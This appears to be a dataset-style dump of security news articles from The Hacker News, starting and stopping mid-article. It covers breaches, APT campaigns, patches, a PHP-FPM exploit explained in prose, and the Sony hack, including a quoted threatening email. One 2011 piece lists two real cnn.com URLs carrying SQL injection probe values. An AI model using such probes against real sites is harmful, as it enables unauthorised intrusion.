The business continuity plan is a step-by-step playbook that helps all departments understand how the business operates in times of disaster or other business-altering scenarios. The disaster recovery component details how critical data and systems can be restored and brought back online.
Report the cyberattack
Many businesses may hesitate to do so, but reporting the attack to customers, stakeholders, and law enforcement is essential. Law enforcement agencies can provide access to resources that may not be available otherwise.
You will also need to consider compliance regulations. The GDPR, for example, provides businesses with a 72-hour window to disclose a data breach involving customers' personal information.
Restore from backup
The best protective measure you have for your data is backups. However, restoring large quantities of data can be time-consuming, forcing the business to be offline for an extended period of time.
This situation highlights the need to discover and contain ransomware infections as quickly as possible to reduce the amount of data that needs recovering.
Remediate, patch, and monitor
In the final phase of recovering from a ransomware attack, companies remediate the ransomware infection, patch systems that may have led to the initial ransomware compromise, and monitor the environment closely for further malicious activity.
It is not unheard of for malicious activity to continue, even if the ransom is paid, or if infected systems were restored. If the same vulnerability exists that led to the initial attack, the environment can become compromised once again.
Remediate common entry points for ransomware
As businesses look to bolster the environment against ransomware and other malicious threats, it is crucial to look at the common entry points for these types of attacks.
Cyberattacks use phishing attacks to harvest stolen credentials which can then be used to launch a ransomware attack, or access systems directly.
Prevention and next steps
Businesses must not be careless in handling password security, especially with Active Directory user accounts. Unfortunately, Active Directory does not have good native security tools for securing passwords in line with today's password security policy requirements.
Specops Password Policy provides breached password protection, disallowed password lists, and many other robust security features to protect your environment. It takes the very basic password policies available in Active Directory and aligns them with modern guidance from NIST and other cybersecurity authorities.
Learn more about Specops Password Policy and download a free trial to protect your environment from vulnerable passwords.
Hacker Selling 200 Million Yahoo Accounts On Dark Web,https://thehackernews.com/2016/08/hack-yahoo-account.html,"Hardly a day goes without headlines about any significant data breach. In the past few months, over 1 Billion account credentials from popular social network sites, including LinkedIn, Tumblr, MySpace and VK.com were exposed on the Internet.
Now, the same hacker who was responsible for selling data dumps for LinkedIn, MySpace, Tumblr and VK.com is now selling what is said to be the login information of 200 Million Yahoo! users on the Dark Web.
200 Million Yahoo! Logins for 3 BTC
The hacker, who goes by the pseudonym ""Peace"" or ""peace_of_mind,"" has uploaded 200 Million Yahoo! credentials up for sale on an underground marketplace called The Real Deal for 3 Bitcoins (US$1,824).
Yahoo! admitted the company was ""aware"" of the potential leak, but did not confirm the authenticity of the data.
The leaked database includes usernames, MD5-hashed passwords and date of births from 200 Million Yahoo! Users. In some cases, there is also the backup email addresses used for the account, country of origin, as well as the ZIP codes for United States users.
Easily Crackable Passwords
Since the passwords are MD5-encrypted, hackers could easily decrypt them using an MD5 decrypter available online, making Yahoo! users open to hackers.
In a brief description, Peace says the Yahoo! database ""most likely"" comes from 2012, the same year when Marissa Mayer became Yahoo's CEO.
Just last week, Verizon acquired Yahoo! for $4.8 Billion. So, the hacker decided to monetize the stolen user accounts before the data lose its value.
When reached out, the company said in a statement:
""We are committed to protecting the security of our users' information and we take such claim very seriously. Our security team is working to determine the facts...we always encourage our users to create strong passwords, or give up passwords altogether by using Yahoo Account Key, and use different passwords for different platforms.""
Use Password Managers to Secure Your Online Accounts
Although the company has not confirmed the breach, users are still advised to change their passwords (and keep a longer and stronger one using a good password manager) and enable two-factor authentication for online accounts immediately, especially if you are using the same password for multiple websites.
You can also adopt a good password manager that allows you to create complex passwords for different sites as well as remember them for you.
We have listed some best password managers here that could help you understand the importance of password manager and help you choose a suitable one, according to your requirement.
China's Cyberspies Targeting Southeast Asian Government Entities,https://thehackernews.com/2021/07/chinas-cyberspies-targeting-southeast.html,"A sweeping and ""highly active campaign"" that originally set its sights on Myanmar has broadened its focus to strike a number of targets located in the Philippines, according to new research.
Russian cybersecurity firm Kaspersky, which first spotted the infections in October 2020, attributed them to a threat actor it tracks as ""LuminousMoth,"" which it connected with medium to high confidence to a Chinese state-sponsored hacking group called HoneyMyte or Mustang Panda, given its observed victimology, tactics, and procedures.
About 100 affected victims have been identified in Myanmar, while the number of victims jumped to nearly 1,400 in the Philippines, although the researchers noted that the actual targets were only a fraction of the initial numbers, including government entities located both within the two countries and abroad.
The goal of the attacks is to affect a wide perimeter of targets with the aim of hitting a select few that are of strategic interest, researchers Mark Lechtik, Paul Rascagneres, and Aseel Kayal said. Put differently, the intrusions are simultaneously wide-ranging and narrow-focused, enabling the threat acor to siphon intelligence from high-profile targets.
The infection vector used in the campaign involves sending a spear-phishing email to the victim containing a Dropbox download link that, when clicked, leads to a RAR archive that's designed to mimic a Word document. The archive file, for its part, comes with two malicious DLL libraries (""version.dll"" and ""wwlib.dll"") and two corresponding executable files that run the malware.
Upon successfully gaining a foothold, an alternative infection chain observed by Kaspersky leverages removable USB drives to propagate the malware to other hosts with the help of ""version.dll"". On the other hand, the purpose of ""wwlib.dll"" is to download a Cobalt Strike beacon on the compromised Windows system from a remote attacker-controlled domain.
In some instances, the attacks incorporated an extra step wherein the threat actor deployed a post-exploitation tool in the form of a signed-but-rogue version of Zoom video conferencing app, using it to hoover sensitive files to a command-and-control server. A valid digital certificate was used to sign the software in an effort to pass off the tool as benign. Also spotted on some infected machines was a second post-exploitation utility that steals cookies from Google Chrome browser.
LuminousMoth's malicious cyber operations and its possible ties to Mustang Panda APT may also be an attempt to shift tactics and update their defensive measures by re-tooling and developing new and unknown malware implants, Kaspersky noted, thus potentially obscuring any ties to their past activities and blurring their attribution to known groups.
""APT actors are known for the frequently targeted nature of their attacks. Typically, they will handpick a set of targets that in turn are handled with almost surgical precision, with infection vectors, malicious implants and payloads being tailored to the victims' identities or environment,"" Kaspersky researchers said.
""It's not often we observe a large-scale attack conducted by actors fitting this profile, usually due to such attacks being noisy, and thus putting the underlying operation at risk of being compromised by security products or researchers.""
PayPal vulnerability : Hack any Paypal account within 30 seconds,https://thehackernews.com/2011/06/paypal-vulnerability-hack-any-paypal.html,"PayPal vulnerability : Hack any Paypal account within 30 seconds
UPDATE : This has been debunked, Paypal accounts are safe. https://thenextweb.com have spoken in depth to Matt Langley, the person who discovered the supposed issue, and it's clear why he assumed there was a serious security breach but the issue is far less serious than initially thought.
Matt Langley explains:
""It seems that the 'victim' had opened an account using an email address of mine, with extra characters thrown in, which Gmail ignores and accepts as the same email address, so it was gmail which uncorrupted the email address and sent the emails to me, not Paypal. I had previously reported an account set-up with fraudulent email address to Paypal many times in the past, but only yesterday noticed that the email address was different to mine, in a way which on any other email system in the world would be a different email address.""
A security vulnerability in PayPal's systems makes it possible to gain full, unrestricted access to any account within 30 seconds, we've heard from Matt Langley of Integrated Computer Enterprises Limited.
The vulnerability lies in PayPal's forgotten password recovery features. Says Langley:
PayPal sends Password Forgotten Change tokens to unauthorized email addresses instead of the email address on the account. Once you follow the link they email, and change the password, you are given total access to that account. No trickery or sophisticated hacking is required. It's a bug in their email system that corrupts email addresses.
Once the attacker has access, there's nothing restricting their ability to siphon money out of the account.
The exploit is, of course, a direct violation of PayPal's privacy policy and a laundry list of laws, so don't try this at home, but PayPal needs to act as thieves aren't particularly concerned with such things.
Worlds first windows 8 Bootkit to be released at MalCon,https://thehackernews.com/2011/11/worlds-first-windows-8-bootkit-to-be.html,"Worlds first windows 8 Bootkit to be released at MalCon
It is amazing how fast security measures are bypassed by hackers. it seems Windows 8 is now Malconed! Peter Kleissner has created the world's first Windows 8 Bootkit which is planned to be released in India at the International Malware Conference MalCon.
An independent programmer and security analyst, peter was working for an anti-virus company from 2008 to 2009 and was speaker at the Black Hat and Hacking at Random technical security conferences. While his main operating fields are Windows security and analysis of new malware, his recent Important projects include the development of the Stoned Bootkit, a research project to subvert the Windows security model.
A bootkit is built upon the following broad parts:
Plugins (the payload)
And as put by peter, those parts are easy to split up in a criminal organization: Teams A-D are writing on the different parts. If you are doing it right, Team D (the payload writers) need no internal knowledge of the bootkit! Peter's research website: https://www.stoned-vienna.com/
As per the MalCon website, peter's travel is still not confirmed citing VISA issues, however, there are chances that the presentation may be done over the video or a speaker may step in on behalf of peter and release it at MalCon.
UniCredit Bank Suffers 'Data Incident' Exposing 3 Million Italian Customer Records,https://thehackernews.com/2019/10/unicredit-bank-data-breach.html,"UniCredit, an Italian global banking and financial services company, announced today that it suffered a security incident that leaked some personal information belonging to at least 3 million of its domestic customers.
Officially founded in 1870, UniCredit is Italy's biggest banking and financial services and one of the leading European commercial banks with more than 8,500 branches across 17 countries.
What happened? — Though UniCredit did not disclose any details on how the data incident happened, the bank did confirm that an unknown attacker has compromised a file created in 2015 containing three million records relating only to its Italian customers.
What type of information was compromised? — The leaked data contains personal information of 3 million customers, including their:
Telephone numbers
Email addresses
What type of information was not compromised? — Unicredit confirmed that the compromised user records did not include any other personal data or bank details that would permit attackers access to customer accounts or allow unauthorized transactions.
What is UniCredit now doing? — The company immediately launched an internal investigation to investigate the incident and verify the extent of the breach, as well as informed all the relevant authorities, including law enforcement.
The company has also begun contacting all potentially affected customers by online banking notifications and/or post.
The bank also said it had placed additional security controls to harden the safety and security of its customers' data.
""Customer data safety and security is UniCredit's top priority, and since the 2016 launch of Transform 2019, the Group has invested an additional 2.4 billion euro in upgrading and strengthening its IT systems and cybersecurity,"" UniCredit said.
""In June 2019, the Group implemented a new strong identification process for access to its web and mobile services, as well as payment transactions. This new process requires a one-time password or biometric identification, further reinforcing its strong security and client protection.""
What affected customers should do now? — Affected customers should mainly be suspicious of phishing emails, which are usually the next step of cyber criminals with personal identifying information (PII) in hands in an attempt to trick users into giving away further details like passwords and banking information.
Though the compromised data doesn't include any banking or financial data, it is always a good idea to be vigilant and keep a close eye on your bank and payment card statements for any unusual activity and report to the bank, if you find any.
This is not the first time when UniCredit has been a victim of such a data security incident. In 2017, the bank disclosed two similar data breaches—one occurred between September and October 2016 and another between June and July 2017— that affected nearly 400,000 Italian customers.
Microsoft Releases Windows Security Updates For Critical Flaws,https://thehackernews.com/2020/11/microsoft-releases-windows-security.html,"Microsoft formally released fixes for 112 newly discovered security vulnerabilities as part of its November 2020 Patch Tuesday, including an actively exploited zero-day flaw disclosed by Google's security team last week.
The rollout addresses flaws, 17 of which are rated as Critical, 93 are rated as Important, and two are rated Low in severity, once again bringing the patch count over 110 after a drop last month.
The security updates encompass a range of software, including Microsoft Windows, Office and Office Services and Web Apps, Internet Explorer, Edge, ChakraCore, Exchange Server, Microsoft Dynamics, Windows Codecs Library, Azure Sphere, Windows Defender, Microsoft Teams, and Visual Studio.
Chief among those fixed is CVE-2020-17087 (CVSS score 7.8), a buffer overflow flaw in Windows Kernel Cryptography Driver (""cng.sys"") that was disclosed on October 30 by the Google Project Zero team as being used in conjunction with a Chrome zero-day to compromise Windows 7 and Windows 10 users.
For its part, Google released an update for its Chrome browser to address the zero-day (CVE-2020-15999) last month.
Microsoft's advisory about the flaw doesn't go into any details beyond the fact that it was a ""Windows Kernel Local Elevation of Privilege Vulnerability"" in part to restructure security advisories in line with the Common Vulnerability Scoring System (CVSS) format starting this month.
Outside of the zero-day, the update fixes a number of remote code execution (RCE) vulnerabilities impacting Exchange Server (CVE-2020-17084), Network File System (CVE-2020-17051), and Microsoft Teams (CVE-2020-17091), as well as a security bypass flaw in Windows Hyper-V virtualization software (CVE-2020-17040).
CVE-2020-17051 is rated 9.8 out of a maximum 10 on the CVSS score, making it a critical vulnerability. Microsoft, however, noted that the attack complexity of the flaw — the conditions beyond the attacker's control that must exist in order to exploit the vulnerability — is low.
As with the zero-day, the advisories associated with these security shortcomings are light on descriptions, with little to no information on how these RCE flaws are abused or which security feature in Hyper-V is being bypassed.
Other critical flaws fixed by Microsoft this month include memory corruption vulnerabilities in Microsoft Scripting Engine (CVE-2020-17052) and Internet Explorer (CVE-2020-17053), and multiple RCE flaws in HEVC Video Extensions Codecs library.
It's highly recommended that Windows users and system administrators apply the latest security patches to resolve the threats associated with these issues.
To install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update, or by selecting Check for Windows updates.
DigitalOcean Data Leak Incident Exposed Some of Its Customers Data,https://thehackernews.com/2020/05/digitalocean-data-breach.html,"DigitalOcean, one of the biggest modern web hosting platforms, recently hit with a concerning data leak incident that exposed some of its customers' data to unknown and unauthorized third parties.
Though the hosting company has not yet publicly released a statement, it did has started warning affected customers of the scope of the breach via an email.
According to the breach notification email that affected customers [1, 2] received, the data leak happened due to negligence where DigitalOcean 'unintentionally' left an internal document accessible to the Internet without requiring any password.
""This document contained your email address and/or account name (the name you gave your account at sign-up) as well as some data about your account that may have included Droplet count, bandwidth usage, some support or sales communications notes, and the amount you paid during 2018,"" the company said in the warning email as shown below.
Upon discovery, a quick digital investigation revealed that the exposed file containing customers' data was accessed by unauthorized third parties at least 15 times before the document was finally taken down.
""Our community is built on trust, so we are taking steps to make sure this doesn't happen again. We will be educating our employees on protecting customer data, establishing new procedures to alert us of potential exposures in a more timely manner, and making configuration changes to prevent future data exposure,"" the company added.
To be noted, this specific breach neither indicates the DigitalOcean website was compromised, nor the customers' login credentials were leaked to the attackers.
So, if you have an account with the hosting service, you don't have to rush into changing your password. However, the service also offers two-factor authentication that every user must enable to add an extra layer of security to their accounts.
The Hacker New has reached out to DigitalOcean for a comment, and the story will be updated with the response.
Update — A spokesperson for the company confirmed The Hacker News of the incident and shared a statement:
""We had a document that was discovered to be shared publicly and while we feel confident there was no malicious access to that document, we informed our customers regardless for transparency. Less than 1% of our customer base was impacted, and the only PII included in the file was account name and email address.
""This was not related to a malicious act to access our systems. Our customers trust us with their data and we believe that an unintended use of that data, no matter how small, is reason enough to be transparent.""
Sharp rise in Android Malwares in Third Quarter of 2012,https://thehackernews.com/2012/10/sharp-rise-in-android-malwares-in-third.html,"Mobile industry watchers have long known that Android is under attack. The number of high risk and dangerous apps targeting Android users jumped from 30,000 in June to 175,000 in September, Trend Micro said in its third quarter security roundup.
While some apps are clearly criminal - such as those that secretly purchase premium smartphone services - others are more of a privacy threat. These include ""Aggressive Adware"" apps that collect more personal information than the user has authorized. App developers may even be aware of the problem, thanks to the existence of rogue ad networks.
""Though most adware is designed to collect user information, a fine line exists between collecting data for simple advertising use and violating one's privacy,"" Trend Micro said. ""Because adware normally collect user information for legitimate purposes, they can serve as an effective means to gather more data than some would want to give out.""
Many of these issues are less of a problem in the United States and more worrisome in other countries, such as China and Russia. In those countries, users commonly use third-party app stores, which have much more lax standards of security. A previous review of mobile threats by security firm Lookout estimated that more than 40 percent of the devices in Russia are infected by malicious software.
Trend Micro noted that fake versions of legitimate Android apps are the most prevalent type of Android malware. This quarter, data-stealers like Solar Charge and premium service abusers like Live Wallpapers in China or fake versions of best-selling apps that spread in Russia further raised concerns about the open nature of the Android ecosystem.
Researchers with Trend found evidence that a series of attacks linked to Chinese hackers that focused on Indian and Japanese military agencies, as well as Tibetan human-rights groups, may include component for infecting Android devices in the future. The Android apps were under development and could steal information as well as install additional components on the phone. Trend Micro also examined threat landscape for non-mobile endpoints.
Apple's SSL Vulnerability might allow NSA to hack iOS Devices Remotely,https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html,"Just two days before Apple has disclosed a critical Security flaw in the SSL implementation on the iOS software that would allow man-in-the-middle attacks to intercept the SSL data by spoofing SSL servers.
Dubbed as CVE-2014-1266, the so-called 'goto fail;' vulnerability in which the secure transport failed to validate the authenticity of the connection has left millions of Apple users vulnerable to Hackers and Spy Agencies, especially like the NSA.
Last Friday, Apple had also released updated version iOS 7.0.6 to patch the vulnerability, which was first discovered in Apple's iOS Devices, but later company had acknowledged its presence in Mac OSX also, that could allow hackers to intercept email and other communications that are meant to be encrypted in iPhone, iPad and Mac computer. Affected versions include iOS up to version 7.0.5 and OS X before 10.9.2.
Security Researchers confirmed, 'Nearly all encrypted traffic, including usernames, passwords, and even Apple app updates can be captured.' with man-in-the-middle attack.
Apple Vulnerability and NSA
I am sure; you still remember the NSA's DROPOUTJEEP Hacking Tool, implant for Apple iOS devices that allows the NSA to remotely control and monitor nearly all the features of an iPhone, including text messages, Geo-Location, microphone and the Camera.
DROPOUTJEEP program was developed in 2008 to conduct espionage on iPhone users, which was revealed by the documents provided by Edward Snowden a month ago. ""The initial release of DROPOUTJEEP will focus on installing the implant via close access methods."" document reads.
According to the vulnerability details published by a Google's Security Researcher 'Adam Langley', a basic mistake in a line of the SSL Encryption code almost screwed up the iOS SSL certificate verification process with an open invitation for the NSA's Prying Eyes.
""This sort of subtle bug deep in the code is a nightmare,"" Adam Langley said on his blog, ""I believe that it's just a mistake, and I feel very bad for whoever might have slipped in an editor and created it.""
Security researchers, Jacob Applebaum said last December, ""Either the NSA has a huge collection of exploits that work against Apple products, meaning that they are hoarding information about critical systems that American companies produce and sabotaging them, or Apple sabotaged it themselves.""
Although, those old techniques are no longer in circulation, but the NSA has a track record of continually evading the privacy of users by exploiting vulnerabilities in various softwares and obviously NSA's capabilities have improved significantly in the past five years.
In the DROPOUTJEEP document, the NSA also admitted, 'A remote installation capability will be pursued for a future release.' That means, it's practically possible that the NSA had already discovered this iOS SSL flaw in an effort to hack iPhone users' remotely by sniffing data and spoofing them to install malware.
An Unanswered Question
'Was the Apple intentionally injected backdoors for NSA or the flaw was an accident???' If it was an accident, then Apple would have been able to release patches for both iOS and Mac OS X at the same time, instead of releasing the patches for both, it silently released a fix for iOS devices on Friday night, but when the cryptographers and security experts began criticizing the company for leaving OS X without the patch, they finally acknowledged Mac OS X too; But it's the 4th day after disclosure and no patch yet has been released for Mac OS X.
Also, Apple contacted CVE (Common Vulnerabilities and Errors database) on 8th January 2014 to reserve the bug number CVE 2014-1266 for the SSL vulnerability and later they have released updated iOS 7.1, which was also vulnerable to the flaw that Apple had already discovered.
However, Apple categorically denied working with the NSA on a backdoor after it was accused last December of creating a way for the US intelligence agency NSA to access contacts and other data in iPhones.
On Dec. 31, Apple spokesperson released a statement saying:
""Apple has never worked with the NSA to create a backdoor in any of our products, including iPhone. Additionally, we have been unaware of this alleged NSA program targeting our products. Whenever we hear about attempts to undermine Apple's industry-leading security, we thoroughly investigate and take appropriate steps to protect our customers. We will continue to use our resources to stay ahead of malicious hackers and defend our customers from security attacks, regardless of who's behind them.""
In 2013, The US Department of Defense passed Apple's iOS 6 for the Government use, that means if the NSA was aware of this flaw, they didn't seem to have informed them.
To Check, whether your web browser is vulnerable to SSL flaw, Click here and to be safe, you are recommended to use an alternate web browser, rather than Safari web browser and avoid using public and unsecured networks.
UPDATE: Apple has finally today releases Mac OS X 10.9.2, which includes a fix for a major SSL security flaw and bringing with it a number of ""improvements to the stability, compatibility and security of your Mac.""
New PHP Flaw Could Let Attackers Hack Sites Running On Nginx Servers,https://thehackernews.com/2019/10/nginx-php-fpm-hacking.html,"If you're running any PHP based website on NGINX server and have PHP-FPM feature enabled for better performance, then beware of a newly disclosed vulnerability that could allow unauthorized attackers to hack your website server remotely.
The vulnerability, tracked as CVE-2019-11043, affects websites with certain configurations of PHP-FPM that is reportedly not uncommon in the wild and could be exploited easily as a proof-of-concept (PoC) exploit for the flaw has already been released publicly.
PHP-FPM is an alternative PHP FastCGI implementation that offers advanced and highly-efficient processing for scripts written in PHP programming language.
The main vulnerability is an ""env_path_info"" underflow memory corruption issue in the PHP-FPM module, and chaining it together with other issues could allow attackers to remotely execute arbitrary code on vulnerable web servers.
The vulnerability was spotted by Andrew Danau, a security researcher at Wallarm while hunting for bugs in a Capture The Flag competition, which was then weaponized by two of his fellow researchers, Omar Ganiev and Emil Lerner, to develop a fully working remote code execution exploit.
Which PHP-based websites are vulnerable to hackers?
Though the publicly released PoC exploit is designed to specifically target vulnerable servers running PHP 7+ versions, the PHP-FPM underflow bug also affects earlier PHP versions and could be weaponized in a different way.
In brief, a website is vulnerable, if:
NGINX is configured to forward PHP pages requests to PHP-FPM processor,
fastcgi_split_path_info directive is present in the configuration and includes a regular expression beginning with a '^' symbol and ending with a '$' symbol,
PATH_INFO variable is defined with fastcgi_param directive,
There are no checks like try_files $uri =404 or if (-f $uri) to determine whether a file exists or not.
This vulnerable NGINX and PHP-FPM configuration looks like the following example:
Here, the fastcgi_split_path_info directive is used to split the URL of PHP web pages into two parts, the value of one help PHP-FPM engine to learn the script name and the other one contains its path info.
How does PoC RCE exploit for PHP FPM work?
According to the researchers, the sample regular expression, which defines the fastcgi_split_path_info directive, as shown, can be manipulated by using the newline character in a way that the split function eventually sets the path info empty.
Next, since there is an arithmetic pointer in FPM code that incorrectly assumes that env_path_info has a prefix equal to the path to the php script without actually verifying the existence of the file on the server, the issue can be exploited by an attacker to overwrite data in the memory by requesting specially crafted URLs of the targeted websites.
In the background, the PoC exploit [1 (PHuiP-FPizdaM), 2 ] researchers released chains together both these issues to manipulate the memory and add custom php.ini values, as shown in the screenshot, in the PHP-FPM configuration file of a targeted server, allowing attackers to execute arbitrary code using a web-shell.
""Using a carefully chosen length of the URL path and query string, an attacker can make path_info point precisely to the first byte of _fcgi_data_seg structure. Putting zero into it moves `char* pos` field backward, and following FCGI_PUTENV overwrites some data (including other fast cgi variables) with the script path,"" researchers said in a bug report submitted to the PHP project.
""Using this technique, I was able to create a fake PHP_VALUE fcgi variable and then use a chain of carefully chosen config values to get code execution.""
PHP 7 updates released to patch FPM flaw
The list of preconditions for successful exploitation, as mentioned above, is not uncommon because the vulnerable configurations are being used by some of the web hosting providers and available on the Internet as part of many PHP FPM tutorials.
One such affected web hosting provider is Nextcloud who released an advisory yesterday warning its users that ""the default Nextcloud NGINX configuration is also vulnerable to this attack"" and recommending system administrators to take immediate actions.
A Patch for this vulnerability was released just yesterday, almost a month after researchers reported it to the PHP developer team.
Since the PoC exploit is already available and the patch released just yesterday, it's likely possible that hackers might have already started scanning the Internet in search for vulnerable websites.
So, users are strongly advised to update PHP to the latest PHP 7.3.11 and PHP 7.2.24. Just do it, even if you are not using the vulnerable configuration.
Thunderstrike — Infecting Apple MacBooks with EFI Bootkit via Thunderbolt Ports,https://thehackernews.com/2015/01/thunderstrike-infecting-apple-macbooks.html,"A security researcher has discovered an easy way to infect Apple's Macintosh computers with an unusual kind of malware using its own Thunderbolt port.
The hack was presented by programming expert Trammell Hudson at the annual Chaos Computer Congress (30C3) in Hamburg Germany. He demonstrated that it is possible to rewrite the firmware of an Intel Thunderbolt Mac.
The hack, dubbed Thunderstrike, actually takes advantage of a years-old vulnerability in the Thunderbolt Option ROM that was first disclosed in 2012 but is yet to be patched. Thunderstrike can infect the Apple Extensible Firmware Interface (EFI) by allocating a malicious code into the boot ROM of an Apple computer through infected Thunderbolt devices.
The hack is really dangerous as, according to the researcher, there is no means for the user to detect the hack, or remove it even by re-installation of the complete OS X, only because the malicious code actually is in the system's own separate ROM.
""Since the boot ROM is independent of the operating system, reinstallation of OS X will not remove it. Nor does it depend on anything stored on the disk, so replacing the hard drive has no effect. A hardware in-system-programming device is the only way to restore the stock firmware.""
Hudson also showed that he could replace Apple's own cryptographic key with a new one, which will prevent legitimate firmware updates from being accepted.
""There are neither hardware nor software cryptographic checks at boot time of firmware validity, so once the malicious code has been flashed to the ROM, it controls the system from the very first instruction,"" Trammell Hudson said. ""It could use SMM and other techniques to hide from attempts to detect it.""
In addition to writing a custom code to the boot ROM, Hudson's presentation also notes a method by which the bootkit could replicate itself to any attached Thunderbolt device, giving it the ability to spread across even air-gapped networks.
In short, an attacker could use the vulnerable Thunderbolt port to install a custom bootkit, which could even replicate itself to any other Thunderbolt-attached device, thereby spreading all over across the networks.
You can watch the entire presentation given by Hudson below and can also refer this blog post to know more about Thunderstrike.
As far as Hudson knows, there are no Mac firmware bootkits in the wild and at this time, it exists only as a proof-of-concept. So, we can presume that the vulnerability can only be exploited if the attacker has physical access to the Thunderbolt Mac. Therefore, a regular Mac user need not to worry about the hack.
Apple has already patched part of the vulnerability in the latest Mac mini and on the iMac with 5K Retina Display, which will soon be available for other Macs.
Multiple SQL Injection Vulnerabilities on CNN website Exposed,https://thehackernews.com/2011/06/multiple-sql-injection-vulnerabilities.html,"Multiple SQL Injection Vulnerabilities on CNN website Exposed
Yes ! CNN is also not Secure site, There are Multiple SQL Injection Vulnerabilities on CNN News site exposed by Hacker named ""Sec Indi"".
CNN.com is among the world's leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN's world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN's global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.
SQL Injection Vulnerable Links :
1.) https://cgi.money.cnn.com/tools/collegecost/collegecost.jsp?college_id='7966
2.) https://cgi.money.cnn.com/tools/fortune/compare_2009.jsp?id=11439'
Screenshots Submitted By Hacker :
SQL Injection Vulnerability was the Reason for biggest data breaches of 2011 ,like various SONY hacks. Hacker said that he inform the CNN admin 2-3 times, but site is still Vulnerable. I think now CNN should take this small bugs Seriously.
New ZeuS Malware spreading automatically via USB Flash Drives,https://thehackernews.com/2013/06/ZeuS-Malware-antivirus-usb-free-spyware.html,"The notorious Zeus Trojan, a family of banking malware known for stealing passwords and draining the accounts of its victims, has steadily increased in recent months.
The malware family itself is frequently updated with mechanisms designed to evade detection by antivirus and network security appliances.
Trend Micro experts spotted another new variant of ZBOT Malware which is capable of spreading itself automatically via USB Flash Drives or removable drives.
According to report, this particular ZBOT variant arrives through a malicious PDF file disguised as a sales invoice document and when user opens this file using Adobe Reader, it triggers an exploit.
Malware also has an auto update module, so that it can download and run an updated copy of itself. To self propagate, it creates a hidden folder with a copy of itself inside the USB drive with a shortcut pointing to the hidden ZBOT copy.
Another variant of ZeuS #Malware spotted, with new feature of spreading itself automatically via USB Flash Drives thehackernews.com/2013/06/ZeuS-M…
— The Hacker News™ (@TheHackersNews) June 11, 2013
Zeus has been so successful it's been made into an exploit kit, a packaged malware that is setup to allow even inexperienced cybercriminals to use it. ZeuS continues to be a formidable malware which is becoming more dangerous with each improvement made to it.
Cyber Attacks on gas pipeline linked to China,https://thehackernews.com/2012/05/cyber-attacks-on-gas-pipeline-linked-to.html,"Cyber Attacks on gas pipeline linked to China
The spear-phishing attacks laying siege to networks in the natural gas pipeline industry apparently are being carried out by the same group that hacked RSA security last year. The attacks, which have been occurring since late this past March, have targeted several of the country's natural gas pipeline companies.
According to U.S. officials, it's unclear if a foreign power is trying to map the gas systems or if hackers are attempting to harm the pipelines. A previous attack on the oil and gas sector seemed to originate in China.
DHS supplied the pipeline industry and its security experts with digital signatures, or ""indicators of compromise"" (IOCs). Those indicators included computer file names, computer IP addresses, domain names, and other key information associated with the cyberspies, which companies could use to check their networks for signs they've been infiltrated.
DHS officials and a spokesman have acknowledged they are working with the FBI to find out who may be behind the intrusions and malicious emails. The Monitor reports that some investigators now believe that the campaign is tied to another attack last year against cybersecurity company RSA, which the head of the National Security Agency told Congress could be traced back to China.
The group responsible for the RSA attacks has also been linked to several previous hacking incidents around the globe.Politico reports that these recent attacks, combined with the devastating 2010 natural gas pipeline explosion in California, illustrate the potential dangers of the rapidly expanding gas pipeline network.
The oil and gas sector has been targeted before. In February 2011 the computer security firm McAfee discovered a computer intrusion labeled ""Night Dragon"" that was traced to China. As part of that attack, individuals tried to obtain sensitive data and financial documents from the oil and gas companies about bids and future drilling exploration projects.
Sony Pictures Employees Receive Threatening Email After Hack,https://thehackernews.com/2014/12/Sony-Hack-Cyber-Attack.html,"The massive hacking attack against Sony Pictures Entertainment have reached a totally unbelievable and scary phase as multiple media sources are saying that Sony Pictures employees received e-mails from hackers threatening to harm them and their family members.
Said one employee, ""It's really crazy and scary.""
It seems like matters for Sony Pictures is getting worse with time. Last month hacking attack on Sony Pictures Entertainment made the studio's internal corporate systems offline and spewed confidential information onto the Internet. Hackers group that identifies itself as #GOP (Guardians of Peace) claimed responsibility for the hack and apparently stolen reams of internal corporate data as well.
Just a week after the cyber-attack on Sony Pictures Entertainment, high-quality versions of five newest films – Annie, Fury, Still Alice, Mr. Turner and To Write Love on Her Arms – distributed by Sony Pictures leaked online during Black Friday. Although it has not been confirmed that the leak of all the films came from the same breach, but the company suffering is the same.
However, it didn't end up here!! Just last week, the massive data breach at Sony appeared to have exposed more sensitive documents, revealing the US Social Security numbers of more than 47,000 celebrities, freelancers, and current and former Sony employees.
And now, according to several media sources, employees at Sony Pictures Entertainment were sent threatening emails from the GOP group of hackers.
The e-mail was written in English that asked the company employees, ""Please sign your name to object the false (sic) of the company at the email address below, if you don't want to suffer damage. If you don't, not only you but your family will be in danger.""
Sony Pictures is working with the Federal Bureau of Investigation (FBI) to investigate the whole matter. Till then, the employees at the Studio were told to turn off their phones after receiving this email messages.
As we reported earlier, there are some possibilities that hackers working on behalf of North Korea were behind the hacking incident, though the country denied it. But Sony believes that the cyber attack on its network is the payback for upcoming Kim Jong assassination comedy film, ""The Interview,"" which is about two journalists who are recruited by the CIA to assassinate North Korean leader Kim Jong Un.
The FBI investigating the matter said that cyber criminals have used malicious software, Wiper malware, to launch destructive cyber-attacks including the one occurred at Sony Pictures Entertainment.
The full email send by hackers to the Studio's employee reads:
""I am the head of GOP who made you worry.
Removing Sony Pictures on earth is a very tiny work for our group which is a worldwide organization. And what we have done so far is only a small part of our further plan.It's your false if you if you think this crisis will be over after some time. All hope will leave you and Sony Pictures will collapse. This situation is only due to Sony Pictures. Sony Pictures is responsible for whatever the result is. Sony Pictues clings to what is good to nobody from the beginning. It's silly to expect in Sony Pictures to take off us. Sony Pictures makes only useless efforts. One beside you can be our member.
Many things beyond imagination will happen at many places of the world. Our agents find themselves act in necessary places. Please sign your name to object the false of the company at the email address below if you don't want to suffer damage. If you don't, not only you but your family will be in danger.
Nobody can prevent us, but the only way is to follow our demand. If you want to prevent us, make your company behave wisely.""
POWELIKS — A Persistent Windows Malware Without Any Installer File,https://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html,"Malware is nothing but a malicious files which is stored on an infected computer system in order to damage the system or steal sensitive data from it or perform other malicious activities. But security researchers have uncovered a new and sophisticated piece of malware that infects systems and steals data without installing any file onto the targeted system.
